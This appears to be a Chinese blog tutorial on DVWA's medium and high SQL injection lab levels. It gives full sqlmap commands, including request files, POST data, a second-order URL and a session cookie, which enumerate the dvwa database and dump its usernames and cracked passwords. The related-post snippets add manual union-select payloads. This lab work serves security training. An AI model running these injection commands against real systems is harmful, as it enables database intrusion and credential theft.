dvwa SQl注入中级、高级(使用sqlmap渗透)

于 2024-06-09 10:49:06 发布
阅读量777 收藏 20
点赞数 9
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72904009/article/details/139558423
版权
sql注入中级

发现是一个表单提交数据

点提交

改为2,再点提交

burp抓包

发现是以post的方式传递

这里尝试以两种方式解题

(1)-r “txt”的方式

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" -p id --batch

-p 指定参数为id --batch 表示全部使用默认选项

发现可以sql注入

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" --current-db -p id --batch

查询数据库名字

数据库名字为dvwa

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" -p id --batch -D dvwa
--tables

有两个数据表

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" -p id --batch -D dvwa -T users --columns

获取列名

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" -p id --batch -D dvwa -T users -C "user,password" --dump

获取user和password的数据

注意到sqlmap帮我们自动爆破了md5加密的数据

(2)-data “post”的方式

python sqlmap.py -u "http://10.198.168.174/DVWA-master/vulnerabilities/sqli/#" -data="id=1&Submit=Submit" -p id --batch --current-db

-data= 后面加上post的数据

后面步骤与前面一致

sql注入高级

点击

跳出来另一个表框

随便输一个1,发现有session

注意到提交出来的数据反而在第一个网站显示

抓包

这样就要联合查询了

sqlmap -u "[数据提交页面url]" --data "[request]"  --second-u "[数据显示页面url]" --cookie="[站点cookie]" 
 

python sqlmap.py -u "http://10.198.168.174/DVWA-master/vulnerabilities/sqli/" -data "id=2&Submit=Submit" -p id --second-u "10.198.168.174/DVWA-master/vulnerabilities/sqli/session-input.php#" --ba
tch --cookie "security=high; PHPSESSID=g2c8dvs0savirn1ro00p6orrjj" --current-db

得到结果

python sqlmap.py -u "http://10.198.168.174/DVWA-master/vulnerabilities/sqli/" -data "id=2&Submit=Submit" -p id --second-u "10.198.168.174/DVWA-master/vulnerabilities/sqli/session-input.php#" --ba
tch --cookie "security=high; PHPSESSID=g2c8dvs0savirn1ro00p6orrjj" -D dvwa --tables

后面操作流程与前面一致

总结:

1.-r “txt”和-data "POST"的方式都能对post的数据进行sql注入

2.-p 指定SQL注入参数

3.--batch表示全部默认

4.--cookie “cookie”加入cookie值

5.Python sqlmap.py -u "[数据提交页面url]" --data "[request]"  --second-u "[数据显示页面url]" --cookie="[站点cookie]" 表示联合查询

柠七ζั͡ޓއއއ๓
关注
  • 9
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 2834
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWASQL注入
qq_46416934的博客
07-29 1250
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 878
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
SQLMap 注入 DVWA实战
Cobra的博客
12-16 3030
一、low级别 1、进入dvwa界面输入1,点击Submit,得到链接 http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit# 2、我们用sqlmap进行爆破 sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" 我们可以看到需要跳转到login的页面,所以,认为这里.
DVWA--sql手工注入(中级)
firecjh的博客
06-09 1082
前端页面设置了下拉选择表单,以此来控制用户的输入。模块对‘users’进行编码。
DVWA-SQL注入sqlmap安装和使用
m0_64037702的博客
07-12 1095
链接:https://pan.baidu.com/s/1-kQgGgzwAJlIbA6hPbvv9Q 提取码:8eqw 双击安装包进行安装 新建一个文件夹选择安装至这个文件夹 我的电脑找到 属性 点击高级系统设置 出现 “系统属性" , 点击环境变量 出现“环境变量” 在下面的“系统变量”里面找到 Path 变量点击编辑(没有找到的话点击新建) 在变量值那里末尾,填上你的Python安装路径 在path中添加自己python的安装路径就行了 Win+R打开cmd输入python出现这个页面表示安装成功
使用Sqlmapdvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3401
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2115
SQL注入与自动注入
使用sqlmap+burpsuite进行中级sql注入
06-01
本篇将详细介绍如何结合sqlmap和BurpSuite工具进行中级SQL注入的实战操作。 首先,我们需要了解sqlmap和BurpSuite的基本功能。sqlmap是一款自动化SQL注入工具,它能自动检测和利用SQL注入漏洞,获取数据库信息。...
DVWASQL注入
随 风
10-27 3046
一、SQL注入原理 二、SQL注入分类 1、按照数据提交方式分类 (1)GET 注入 (2)POST 注入 (3)Cookie 注入 (4)HTTP 头部注入 2、按照注入点分类 (1)数字型注入点 (2)字符型注入点 (3)搜索型注入点 3、按照执行效果分类 (1)基于布尔的盲注 (2)基于时间的盲注 (3)基于报错的注入 (4)联合查询注入 (5)堆叠注入 (6)宽字节注入 三、SQL注入流程 (1)判断是否存在注入,是数字型还是字符型 (2)猜解SQL查询语句中的字段数 (3)确定显示位置 (4)获取
DVWA_SQL注入低中等级讲解
Keiltest的博客
08-10 1055
本章讲解了sql注入
sql注入中级实验
2303_77203664的博客
01-10 597
转换为16进制后前面加0x,都是一样,0x是前置位,标志位告诉别人这是16进制数。则,在中级的安全状况下,可以通过代理历览器来获取想要的信息。id=1 or 1=1 order by 3#----报错。id=1 or 1=1 order by 1#----有。id=1 or 1=1 order by 2#----有。在火狐中比较繁琐,所以我们使用BP的重放,打开步骤如下。6.获取user和password这两个字段对应数据。id=1‘ or '1'='1-----显示报错。在抓包内容里我们可以修改。
DVWA-SQL注入(SQL Injection)低/中/高级
热门推荐
wangyuxiang946的博客
08-14 1万+
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injection-low级别 SQL注入的low级别需要我们输入用户的ID作为参数,后端的SQL语句根据用户ID查询用户的信息并返回,执行SQL之前并没有过滤,源码如下 我们输入一个正确的用户ID : 1 , 发现输入的参数拼接到了url地址栏中,由此推断,此关卡使用的请求方式为GET请求,我们直接在输.
DVWASQL注入(低中高级
qq_43455259的博客
01-20 4801
dvwasql注入
DVWA-SQL注入
WY92139010的博客
05-03 965
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
DVWA sql注入(低中高)
m0_73581247的博客
04-08 439
这样我们就能得到和上面初级一样的内容,接下来的和初级类似。因为这里对一些字符进行了转义,需要使用HEX进行转义。都说手动注入烦,直接sqlmap一把梭哈。偶然发现sqlmap还有解密功能。这里我感觉和第一关差不多。太简单了,只给出代码。我就不抓了直接给代码。
DVWA (Dam Vulnerable Web Application)中级SQL注入实战
baidu_33260220的博客
11-07 4690
1、输入’ or 1=1 #  ,发现’被转义成\’    ‘ “  \ 都被转义加\ 2、输入1 or 1=1 #  ,发现有数字型注入  3、输入1 order by 2判断有两个字段,输入1 union select 1,2 #判断两个字段都可以代入参数进行查询     4、输入1 union select user(),datab
渗透测试-SQL注入sqlmap使用方法及实战案例
lza20001103的博客
07-19 3929
渗透测试-SQL注入sqlmap使用方法及实战案例
DVWA——SQL注入
最新发布
m0_74426634的博客
04-07 1125
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
dvwa sql注入 sqlmap
10-31
DVWA是一个用于演示Web应用程序安全漏洞的虚拟机,其中包括了SQL注入漏洞。而SQLMap是一款自动化的SQL注入工具,可以用于检测和利用SQL注入漏洞。在使用SQLMap进行DVWA SQL注入时,可以通过获取数据库名称、表名、列名等信息,进而进行数据的读取、修改、删除等操作。具体使用方法可以参考引用中提供的链接和命令。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值